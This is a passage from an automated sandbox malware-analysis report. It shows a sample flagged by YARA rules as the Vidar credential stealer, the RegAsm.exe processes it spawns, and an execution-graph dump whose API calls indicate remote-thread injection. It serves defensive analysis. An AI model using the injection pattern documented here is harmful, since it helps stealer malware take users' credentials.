                                                                                                                                                                                                                                                                                                MD5 hash:B841D5F5E8102EE6AC56D565FBB58879
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x600000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x4c0000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:3%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:1.4%
                                                                                                                                                                                                                                                                                                  Signature Coverage:2.7%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:637
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                                                                                                                                                                                  execution_graph 33937 3c5def 33938 3c5dfb ___scrt_is_nonwritable_in_current_image 33937->33938 33963 3c5ff1 33938->33963 33940 3c5e02 33941 3c5f5b 33940->33941 33951 3c5e2c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 33940->33951 33999 3c67df 4 API calls 2 library calls 33941->33999 33943 3c5f62 33992 3d0a54 33943->33992 33947 3c5f70 33948 3c5e4b 33949 3c5ecc 33974 3d0692 33949->33974 33951->33948 33951->33949 33995 3d0a2e 43 API calls 4 library calls 33951->33995 33953 3c5ed2 33978 3e32df 33953->33978 33957 3c5ef3 33957->33943 33958 3c5ef7 33957->33958 33959 3c5f00 33958->33959 33997 3d0a09 23 API calls __purecall 33958->33997 33998 3c6162 79 API calls ___scrt_uninitialize_crt 33959->33998 33962 3c5f09 33962->33948 33964 3c5ffa 33963->33964 34001 3c62bc IsProcessorFeaturePresent 33964->34001 33966 3c6006 34002 3c902e 10 API calls 2 library calls 33966->34002 33968 3c600b 33973 3c600f 33968->33973 34003 3d266b 33968->34003 33971 3c6026 33971->33940 33973->33940 33975 3d069b 33974->33975 33976 3d06a0 33974->33976 34016 3d03ec 33975->34016 33976->33953 34282 3c1d41 33978->34282 33982 3e330a 34296 3e3101 33982->34296 33985 3e334c 33985->33985 34307 3e3000 33985->34307 33990 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 33991 3c5ee9 33990->33991 33996 3c68f9 GetModuleHandleW 33991->33996 34631 3d083c 33992->34631 33995->33949 33996->33957 33997->33959 33998->33962 33999->33943 34000 3d0a18 23 API calls __purecall 34000->33947 34001->33966 34002->33968 34007 3dc866 34003->34007 34006 3c904d 7 API calls 2 library calls 34006->33973 34008 3dc876 34007->34008 34009 3c6018 34007->34009 34008->34009 34011 3d4652 34008->34011 34009->33971 34009->34006 34012 3d4659 34011->34012 34013 3d469c GetStdHandle 34012->34013 34014 3d46fe 34012->34014 34015 3d46af GetFileType 34012->34015 34013->34012 34014->34008 34015->34012 34017 3d03f5 34016->34017 34020 3d040b 34016->34020 34017->34020 34022 3d0418 34017->34022 34019 3d0402 34019->34020 34039 3d0583 15 API calls 3 library calls 34019->34039 34020->33976 34023 3d0424 34022->34023 34024 3d0421 34022->34024 34040 3d9b22 34023->34040 34024->34019 34029 3d0435 34067 3d2e49 14 API calls __dosmaperr 34029->34067 34030 3d0441 34068 3d0472 43 API calls 4 library calls 34030->34068 34033 3d043b 34033->34019 34034 3d0448 34069 3d2e49 14 API calls __dosmaperr 34034->34069 34036 3d0465 34070 3d2e49 14 API calls __dosmaperr 34036->34070 34038 3d046b 34038->34019 34039->34020 34041 3d9b2b 34040->34041 34042 3d042a 34040->34042 34071 3d436c 34041->34071 34046 3d9e24 GetEnvironmentStringsW 34042->34046 34047 3d9e3c 34046->34047 34052 3d042f 34046->34052 34277 3d8a72 WideCharToMultiByte 34047->34277 34049 3d9e59 34050 3d9e6e 34049->34050 34051 3d9e63 FreeEnvironmentStringsW 34049->34051 34053 3d2e83 __strnicoll 15 API calls 34050->34053 34051->34052 34052->34029 34052->34030 34054 3d9e75 34053->34054 34055 3d9e7d 34054->34055 34056 3d9e8e 34054->34056 34278 3d2e49 14 API calls __dosmaperr 34055->34278 34279 3d8a72 WideCharToMultiByte 34056->34279 34059 3d9e82 FreeEnvironmentStringsW 34059->34052 34060 3d9e9e 34061 3d9ead 34060->34061 34062 3d9ea5 34060->34062 34281 3d2e49 14 API calls __dosmaperr 34061->34281 34280 3d2e49 14 API calls __dosmaperr 34062->34280 34065 3d9eab FreeEnvironmentStringsW 34065->34052 34067->34033 34068->34034 34069->34036 34070->34038 34072 3d437d 34071->34072 34073 3d4377 34071->34073 34077 3d4383 34072->34077 34123 3d5797 6 API calls std::_Locinfo::_Locinfo_dtor 34072->34123 34122 3d5758 6 API calls std::_Locinfo::_Locinfo_dtor 34073->34122 34076 3d4397 34076->34077 34078 3d439b 34076->34078 34081 3d4388 34077->34081 34131 3cfb99 43 API calls __purecall 34077->34131 34124 3d2862 14 API calls 3 library calls 34078->34124 34099 3d992d 34081->34099 34082 3d43a7 34084 3d43af 34082->34084 34085 3d43c4 34082->34085 34125 3d5797 6 API calls std::_Locinfo::_Locinfo_dtor 34084->34125 34127 3d5797 6 API calls std::_Locinfo::_Locinfo_dtor 34085->34127 34088 3d43d0 34089 3d43d4 34088->34089 34090 3d43e3 34088->34090 34128 3d5797 6 API calls std::_Locinfo::_Locinfo_dtor 34089->34128 34129 3d40df 14 API calls __Getctype 34090->34129 34094 3d43bb 34126 3d2e49 14 API calls __dosmaperr 34094->34126 34095 3d43ee 34130 3d2e49 14 API calls __dosmaperr 34095->34130 34096 3d43c1 34096->34077 34098 3d43f5 34098->34081 34132 3d9a82 34099->34132 34106 3d9989 34170 3d2e49 14 API calls __dosmaperr 34106->34170 34107 3d9997 34159 3d9b7d 34107->34159 34111 3d9970 34111->34042 34112 3d99cf 34171 3cd503 14 API calls __dosmaperr 34112->34171 34114 3d99d4 34172 3d2e49 14 API calls __dosmaperr 34114->34172 34115 3d9a16 34116 3d9a5f 34115->34116 34174 3d959f 43 API calls 2 library calls 34115->34174 34175 3d2e49 14 API calls __dosmaperr 34116->34175 34118 3d99ea 34118->34115 34173 3d2e49 14 API calls __dosmaperr 34118->34173 34122->34072 34123->34076 34124->34082 34125->34094 34126->34096 34127->34088 34128->34094 34129->34095 34130->34098 34133 3d9a8e ___scrt_is_nonwritable_in_current_image 34132->34133 34139 3d9aa8 34133->34139 34176 3cd557 EnterCriticalSection 34133->34176 34135 3d9ab8 34142 3d9ae4 34135->34142 34177 3d2e49 14 API calls __dosmaperr 34135->34177 34136 3d9957 34143 3d96ad 34136->34143 34139->34136 34179 3cfb99 43 API calls __purecall 34139->34179 34178 3d9b01 LeaveCriticalSection std::_Lockit::~_Lockit 34142->34178 34180 3cf5fd 34143->34180 34146 3d96ce GetOEMCP 34148 3d96f7 34146->34148 34147 3d96e0 34147->34148 34149 3d96e5 GetACP 34147->34149 34148->34111 34150 3d2e83 34148->34150 34149->34148 34151 3d2ec1 34150->34151 34152 3d2e91 34150->34152 34192 3cd503 14 API calls __dosmaperr 34151->34192 34154 3d2eac HeapAlloc 34152->34154 34157 3d2e95 __Getctype 34152->34157 34155 3d2ebf 34154->34155 34154->34157 34156 3d2ec6 34155->34156 34156->34106 34156->34107 34157->34151 34157->34154 34191 3cfe70 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 34157->34191 34160 3d96ad 45 API calls 34159->34160 34161 3d9b9d 34160->34161 34162 3d9bda IsValidCodePage 34161->34162 34167 3d9c16 codecvt 34161->34167 34164 3d9bec 34162->34164 34162->34167 34166 3d9c1b GetCPInfo 34164->34166 34169 3d9bf5 codecvt 34164->34169 34165 3d99c4 34165->34112 34165->34118 34166->34167 34166->34169 34204 3c5cbb 34167->34204 34193 3d9781 34169->34193 34170->34111 34171->34114 34172->34111 34173->34115 34174->34116 34175->34111 34176->34135 34177->34142 34178->34139 34181 3cf61b 34180->34181 34182 3cf614 34180->34182 34181->34182 34188 3d42b1 43 API calls 3 library calls 34181->34188 34182->34146 34182->34147 34184 3cf63c 34189 3d2ed1 43 API calls __Getctype 34184->34189 34186 3cf652 34190 3d2f2f 43 API calls __strnicoll 34186->34190 34188->34184 34189->34186 34190->34182 34191->34157 34192->34156 34194 3d97a9 GetCPInfo 34193->34194 34203 3d9872 34193->34203 34199 3d97c1 34194->34199 34194->34203 34196 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34198 3d992b 34196->34198 34198->34167 34211 3d82d6 34199->34211 34202 3d85cd 48 API calls 34202->34203 34203->34196 34205 3c5cc4 IsProcessorFeaturePresent 34204->34205 34206 3c5cc3 34204->34206 34208 3c650d 34205->34208 34206->34165 34276 3c64d0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34208->34276 34210 3c65f0 34210->34165 34212 3cf5fd __strnicoll 43 API calls 34211->34212 34213 3d82f6 34212->34213 34231 3d89f6 34213->34231 34215 3d83ba 34218 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34215->34218 34216 3d83b2 34234 3c5c9d 14 API calls std::_Locinfo::~_Locinfo 34216->34234 34217 3d8323 34217->34215 34217->34216 34220 3d2e83 __strnicoll 15 API calls 34217->34220 34222 3d8348 __alloca_probe_16 codecvt 34217->34222 34221 3d83dd 34218->34221 34220->34222 34226 3d85cd 34221->34226 34222->34216 34223 3d89f6 __strnicoll MultiByteToWideChar 34222->34223 34224 3d8393 34223->34224 34224->34216 34225 3d839e GetStringTypeW 34224->34225 34225->34216 34227 3cf5fd __strnicoll 43 API calls 34226->34227 34228 3d85e0 34227->34228 34235 3d83df 34228->34235 34232 3d8a07 MultiByteToWideChar 34231->34232 34232->34217 34234->34215 34236 3d83fa __strnicoll 34235->34236 34237 3d89f6 __strnicoll MultiByteToWideChar 34236->34237 34240 3d8440 34237->34240 34238 3d85b8 34239 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34238->34239 34241 3d85cb 34239->34241 34240->34238 34242 3d2e83 __strnicoll 15 API calls 34240->34242 34244 3d8466 __alloca_probe_16 34240->34244 34251 3d84ec 34240->34251 34241->34202 34242->34244 34245 3d89f6 __strnicoll MultiByteToWideChar 34244->34245 34244->34251 34246 3d84ab 34245->34246 34246->34251 34263 3d5916 34246->34263 34249 3d84dd 34249->34251 34255 3d5916 std::_Locinfo::_Locinfo_dtor 7 API calls 34249->34255 34250 3d8515 34252 3d85a0 34250->34252 34253 3d2e83 __strnicoll 15 API calls 34250->34253 34256 3d8527 __alloca_probe_16 34250->34256 34275 3c5c9d 14 API calls std::_Locinfo::~_Locinfo 34251->34275 34274 3c5c9d 14 API calls std::_Locinfo::~_Locinfo 34252->34274 34253->34256 34255->34251 34256->34252 34257 3d5916 std::_Locinfo::_Locinfo_dtor 7 API calls 34256->34257 34258 3d856a 34257->34258 34258->34252 34272 3d8a72 WideCharToMultiByte 34258->34272 34260 3d8584 34260->34252 34261 3d858d 34260->34261 34273 3c5c9d 14 API calls std::_Locinfo::~_Locinfo 34261->34273 34264 3d5448 std::_Locinfo::_Locinfo_dtor 5 API calls 34263->34264 34265 3d5921 34264->34265 34266 3d594e 34265->34266 34267 3d5927 LCMapStringEx 34265->34267 34268 3d5973 __strnicoll 5 API calls 34266->34268 34271 3d596e 34267->34271 34269 3d5967 LCMapStringW 34268->34269 34269->34271 34271->34249 34271->34250 34271->34251 34272->34260 34273->34251 34274->34251 34275->34238 34276->34210 34277->34049 34278->34059 34279->34060 34280->34065 34281->34065 34283 3c1d5e _strlen 34282->34283 34318 3c3085 34283->34318 34285 3c1d6b 34286 3c5cc9 34285->34286 34287 3c5cce _Yarn 34286->34287 34288 3c5ce8 34287->34288 34291 3c1239 Concurrency::cancel_current_task 34287->34291 34329 3cfe70 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 34287->34329 34288->33982 34290 3c5cf4 34290->34290 34291->34290 34327 3c721a RaiseException 34291->34327 34293 3c1255 34328 3c11af 43 API calls ___std_exception_copy 34293->34328 34295 3c1262 34295->33982 34297 3e31fb 34296->34297 34306 3e3132 34296->34306 34330 3c1bd9 34297->34330 34300 3c1d41 44 API calls std::ios_base::_Init 34300->34306 34301 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34302 3e3215 VirtualProtectEx FreeConsole 34301->34302 34302->33985 34303 3c2611 44 API calls 34303->34306 34304 3cccad 46 API calls 34304->34306 34305 3c25eb 43 API calls std::ios_base::_Init 34305->34306 34306->34297 34306->34300 34306->34303 34306->34304 34306->34305 34309 3e3021 34307->34309 34311 3e30e8 34309->34311 34335 3c1bff 34309->34335 34347 3c2f5f 34309->34347 34312 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34311->34312 34313 3e30fa CreateRemoteThread WaitForSingleObjectEx CloseHandle 34312->34313 34314 3c25eb 34313->34314 34315 3c25f6 34314->34315 34316 3c25ff 34314->34316 34630 3c3729 43 API calls 2 library calls 34315->34630 34316->33990 34319 3c30f0 34318->34319 34321 3c3096 std::ios_base::_Init 34318->34321 34326 3c12a8 44 API calls std::ios_base::_Init 34319->34326 34324 3c309d std::ios_base::_Init 34321->34324 34325 3c3c83 44 API calls 2 library calls 34321->34325 34324->34285 34325->34324 34327->34293 34328->34295 34329->34287 34331 3c1be1 34330->34331 34333 3c1bf1 34330->34333 34334 3c3729 43 API calls 2 library calls 34331->34334 34333->34301 34334->34333 34336 3c1c0b __EH_prolog3_catch 34335->34336 34354 3c2563 34336->34354 34339 3c1c92 34381 3c1b57 34339->34381 34341 3c1d01 34390 3c2548 34341->34390 34344 3c1c4a std::ios_base::_Ios_base_dtor 34373 3c2323 34344->34373 34345 3c1d09 codecvt 34345->34309 34554 3c3a8d 34347->34554 34349 3c2f78 34558 3c39c5 34349->34558 34351 3c2f83 34352 3c2b87 44 API calls 34351->34352 34353 3c2f8a 34352->34353 34353->34309 34356 3c2581 34354->34356 34355 3c1c1e 34355->34339 34358 3c2f91 34355->34358 34356->34355 34394 3c2b87 34356->34394 34402 3c3e86 34358->34402 34362 3c2fb5 34363 3c2fc8 34362->34363 34421 3c397b 73 API calls 3 library calls 34362->34421 34414 3c3ede 34363->34414 34365 3c2ffe 34365->34344 34367 3c2fd8 34368 3c2fdf 34367->34368 34369 3c3004 34367->34369 34422 3c41a8 44 API calls std::_Facet_Register 34368->34422 34423 3c158a 44 API calls 2 library calls 34369->34423 34372 3c3009 34374 3c2358 34373->34374 34428 3c1134 34374->34428 34379 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34380 3c2395 34379->34380 34380->34339 34382 3c1bb2 34381->34382 34384 3c1b6e std::ios_base::_Init 34381->34384 34382->34341 34383 3c1ba7 34551 3c721a RaiseException 34383->34551 34384->34383 34550 3c1b2e 44 API calls std::ios_base::_Init 34384->34550 34386 3c1bc0 34552 3c14f8 43 API calls std::bad_exception::bad_exception 34386->34552 34388 3c1bcd 34388->34341 34391 3c2550 34390->34391 34393 3c255b 34391->34393 34553 3c2c45 44 API calls 3 library calls 34391->34553 34393->34345 34395 3c2b93 __EH_prolog3_catch 34394->34395 34396 3c2c38 codecvt 34395->34396 34397 3c2563 44 API calls 34395->34397 34396->34355 34398 3c2bb2 34397->34398 34399 3c2c30 34398->34399 34401 3c1b57 std::ios_base::_Init 44 API calls 34398->34401 34400 3c2548 44 API calls 34399->34400 34400->34396 34401->34399 34403 3c3e9c 34402->34403 34404 3c3e95 34402->34404 34406 3c2fa2 34403->34406 34425 3c5a6d EnterCriticalSection 34403->34425 34424 3cd5b6 6 API calls 2 library calls 34404->34424 34408 3c16b4 34406->34408 34409 3c16e4 34408->34409 34410 3c16c0 34408->34410 34409->34362 34411 3c3e86 std::_Lockit::_Lockit 7 API calls 34410->34411 34412 3c16ca 34411->34412 34413 3c3ede std::_Lockit::~_Lockit 2 API calls 34412->34413 34413->34409 34415 3cd5c4 34414->34415 34418 3c3ee8 34414->34418 34427 3cd59f LeaveCriticalSection 34415->34427 34417 3c3efb 34417->34365 34418->34417 34426 3c5a7b LeaveCriticalSection 34418->34426 34419 3cd5cb 34419->34365 34421->34367 34422->34363 34423->34372 34424->34406 34425->34406 34426->34417 34427->34419 34463 3c1106 34428->34463 34431 3c278c 34432 3c27c2 34431->34432 34492 3c36b0 34432->34492 34434 3c2818 std::ios_base::_Ios_base_dtor 34507 3c2e2b 34434->34507 34438 3c28ed 34439 3c29bc 34438->34439 34440 3c2925 34438->34440 34441 3c2757 72 API calls 34439->34441 34442 3c292c 34440->34442 34443 3c2974 34440->34443 34446 3c296f 34441->34446 34530 3c272b 72 API calls 34442->34530 34445 3c2757 72 API calls 34443->34445 34448 3c2997 34445->34448 34525 3c2757 34446->34525 34447 3c2943 34449 3c2757 72 API calls 34447->34449 34531 3c272b 72 API calls 34448->34531 34449->34446 34450 3c286e std::ios_base::_Ios_base_dtor 34450->34438 34529 3c2d6e 44 API calls 34450->34529 34456 3c2a41 34457 3c25eb std::ios_base::_Init 43 API calls 34456->34457 34458 3c2a4d 34457->34458 34533 3c25c2 43 API calls 34458->34533 34460 3c2a56 34461 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34460->34461 34462 3c237f 34461->34462 34462->34379 34464 3c111d _swprintf 34463->34464 34467 3cc270 34464->34467 34468 3cc284 _Fputc 34467->34468 34473 3ca65a 34468->34473 34474 3ca689 34473->34474 34475 3ca666 34473->34475 34480 3ca6b0 34474->34480 34488 3ca4e6 48 API calls 3 library calls 34474->34488 34487 3cd388 29 API calls 2 library calls 34475->34487 34479 3ca681 34481 3cb280 34479->34481 34480->34479 34489 3cd388 29 API calls 2 library calls 34480->34489 34482 3cb28c 34481->34482 34483 3cb2a3 34482->34483 34490 3cb450 43 API calls 2 library calls 34482->34490 34485 3c1127 34483->34485 34491 3cb450 43 API calls 2 library calls 34483->34491 34485->34431 34487->34479 34488->34480 34489->34479 34490->34483 34491->34485 34493 3c3e86 std::_Lockit::_Lockit 7 API calls 34492->34493 34494 3c36c1 34493->34494 34495 3c16b4 int 9 API calls 34494->34495 34497 3c36d4 34495->34497 34496 3c36e7 34498 3c3ede std::_Lockit::~_Lockit 2 API calls 34496->34498 34497->34496 34534 3c1850 73 API calls 4 library calls 34497->34534 34499 3c371d 34498->34499 34499->34434 34501 3c36f7 34502 3c36fe 34501->34502 34503 3c3723 34501->34503 34535 3c41a8 44 API calls std::_Facet_Register 34502->34535 34536 3c158a 44 API calls 2 library calls 34503->34536 34506 3c3728 34537 3c37e5 34507->34537 34509 3c2833 34510 3c34e8 34509->34510 34511 3c3e86 std::_Lockit::_Lockit 7 API calls 34510->34511 34512 3c34fa 34511->34512 34513 3c16b4 int 9 API calls 34512->34513 34514 3c350d 34513->34514 34515 3c3520 34514->34515 34546 3c3927 75 API calls 3 library calls 34514->34546 34516 3c3ede std::_Lockit::~_Lockit 2 API calls 34515->34516 34518 3c3556 34516->34518 34518->34450 34519 3c3530 34520 3c355c 34519->34520 34521 3c3537 34519->34521 34548 3c158a 44 API calls 2 library calls 34520->34548 34547 3c41a8 44 API calls std::_Facet_Register 34521->34547 34524 3c3561 34526 3c2762 34525->34526 34528 3c277a 34525->34528 34526->34528 34549 3c2d48 72 API calls 34526->34549 34532 3c272b 72 API calls 34528->34532 34529->34450 34530->34447 34531->34446 34532->34456 34533->34460 34534->34501 34535->34496 34536->34506 34538 3c385a 34537->34538 34541 3c37f6 34537->34541 34545 3c12a8 44 API calls std::ios_base::_Init 34538->34545 34543 3c37fd 34541->34543 34544 3c3c66 44 API calls 2 library calls 34541->34544 34543->34509 34544->34543 34546->34519 34547->34515 34548->34524 34549->34526 34550->34383 34551->34386 34552->34388 34553->34393 34555 3c3aa1 34554->34555 34556 3c36b0 74 API calls 34555->34556 34557 3c3aaa std::ios_base::_Ios_base_dtor 34556->34557 34557->34349 34559 3c39d1 __EH_prolog3_catch 34558->34559 34560 3c2563 44 API calls 34559->34560 34562 3c39e3 34560->34562 34561 3c39e9 34564 3c1b57 std::ios_base::_Init 44 API calls 34561->34564 34562->34561 34568 3c2edf 34562->34568 34565 3c3a76 34564->34565 34566 3c2548 44 API calls 34565->34566 34567 3c3a7e codecvt 34566->34567 34567->34351 34569 3c2ee7 34568->34569 34570 3c2eef 34569->34570 34572 3c4fa8 34569->34572 34570->34561 34573 3c4fd3 34572->34573 34578 3c4fca 34572->34578 34576 3c5013 34573->34576 34573->34578 34580 3c5039 34573->34580 34574 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34575 3c5035 34574->34575 34575->34570 34584 3c4419 34576->34584 34578->34574 34579 3c5094 34579->34578 34587 3ced08 71 API calls _Fputc 34579->34587 34580->34579 34581 3c5075 34580->34581 34581->34578 34583 3c4419 _Fputc 47 API calls 34581->34583 34583->34578 34588 3cdd94 34584->34588 34587->34578 34589 3cdda7 _Fputc 34588->34589 34594 3cdb98 34589->34594 34592 3cb280 _Fputc 43 API calls 34593 3c4427 34592->34593 34593->34578 34595 3cdba4 ___scrt_is_nonwritable_in_current_image 34594->34595 34596 3cdbab 34595->34596 34597 3cdbd0 34595->34597 34628 3cd388 29 API calls 2 library calls 34596->34628 34605 3cd989 EnterCriticalSection 34597->34605 34600 3cdbdf 34606 3cdc5c 34600->34606 34601 3cdbc6 34601->34592 34605->34600 34607 3cdc93 34606->34607 34614 3cdc81 _Fputc 34606->34614 34608 3d3de5 _Ungetc 43 API calls 34607->34608 34609 3cdc9a 34608->34609 34610 3d3de5 _Ungetc 43 API calls 34609->34610 34615 3cdcc2 34609->34615 34612 3cdcab 34610->34612 34611 3c5cbb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34613 3cdbf0 34611->34613 34612->34615 34616 3d3de5 _Ungetc 43 API calls 34612->34616 34629 3cdc20 LeaveCriticalSection _Ungetc 34613->34629 34614->34611 34615->34614 34617 3d3de5 _Ungetc 43 API calls 34615->34617 34618 3cdcb7 34616->34618 34619 3cdcf5 34617->34619 34620 3d3de5 _Ungetc 43 API calls 34618->34620 34621 3d3de5 _Ungetc 43 API calls 34619->34621 34627 3cdd18 34619->34627 34620->34615 34622 3cdd01 34621->34622 34624 3d3de5 _Ungetc 43 API calls 34622->34624 34622->34627 34623 3d3ad7 _Fputc 45 API calls 34623->34614 34625 3cdd0d 34624->34625 34626 3d3de5 _Ungetc 43 API calls 34625->34626 34626->34627 34627->34614 34627->34623 34628->34601 34629->34601 34630->34316 34632 3d0869 34631->34632 34633 3d087b 34631->34633 34658 3d0904 GetModuleHandleW 34632->34658 34643 3d0704 34633->34643 34637 3d086e 34637->34633 34659 3d0969 GetModuleHandleExW 34637->34659 34638 3c5f68 34638->34000 34642 3d08cd 34644 3d0710 ___scrt_is_nonwritable_in_current_image 34643->34644 34665 3cd557 EnterCriticalSection 34644->34665 34646 3d071a 34666 3d0751 34646->34666 34648 3d0727 34670 3d0745 34648->34670 34651 3d08d3 34675 3d0947 34651->34675 34654 3d08f1 34656 3d0969 __purecall 3 API calls 34654->34656 34655 3d08e1 GetCurrentProcess TerminateProcess 34655->34654 34657 3d08f9 ExitProcess 34656->34657 34658->34637 34660 3d09c9 34659->34660 34661 3d09a8 GetProcAddress 34659->34661 34663 3d09cf FreeLibrary 34660->34663 34664 3d087a 34660->34664 34661->34660 34662 3d09bc 34661->34662 34662->34660 34663->34664 34664->34633 34665->34646 34667 3d075d ___scrt_is_nonwritable_in_current_image 34666->34667 34669 3d07c4 __purecall 34667->34669 34673 3d24d6 14 API calls 3 library calls 34667->34673 34669->34648 34674 3cd59f LeaveCriticalSection 34670->34674 34672 3d0733 34672->34638 34672->34651 34673->34669 34674->34672 34680 3da24c GetPEB 34675->34680 34678 3d08dd 34678->34654 34678->34655 34679 3d0951 GetPEB 34679->34678 34681 3d094c 34680->34681 34682 3da266 